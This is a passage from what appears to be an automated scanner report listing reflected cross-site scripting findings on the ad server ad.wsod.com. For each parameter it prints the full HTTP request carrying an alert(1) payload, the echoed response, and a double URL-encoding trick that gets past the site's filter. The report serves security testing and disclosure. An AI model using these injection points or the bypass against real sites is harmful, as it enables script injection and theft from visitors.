GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b";alert(1)//abbd6d3e408/1303843054**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b78
...[SNIP]...

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a78"-alert(1)-"a549992a4e6 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843026**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf8a"-alert(1)-"17ee62d1a47 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843021**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 983cb"-alert(1)-"b33569e6d27 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843012**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9476a"-alert(1)-"985f8e3db43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1">
...[SNIP]...

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ad74"-alert(1)-"523f8ff21d1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843266**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77be7"-alert(1)-"86a6913ea5d was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/353.0.js.120x30/1303843294**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79400"-alert(1)-"898301abb9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9">
...[SNIP]...

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a932"-alert(1)-"098c112b24 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/353.0.js.120x30/1303843300**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5 was submitted in the REST URL parameter 2. This input was echoed as bdbb2";alert(1)//d3a2d6e4cb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2";alert(1)//d3a2d6e4cb5/353.0.js.120x30/1303843317**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce
...[SNIP]...

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c9b%2522%253balert%25281%2529%252f%252fe620cc65532 was submitted in the REST URL parameter 3. This input was echoed as 36c9b";alert(1)//e620cc65532 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b%2522%253balert%25281%2529%252f%252fe620cc65532/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:42:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b";alert(1)//e620cc65532/1303843320**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a
...[SNIP]...

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be94"-alert(1)-"68a9d8cb374 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843289**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

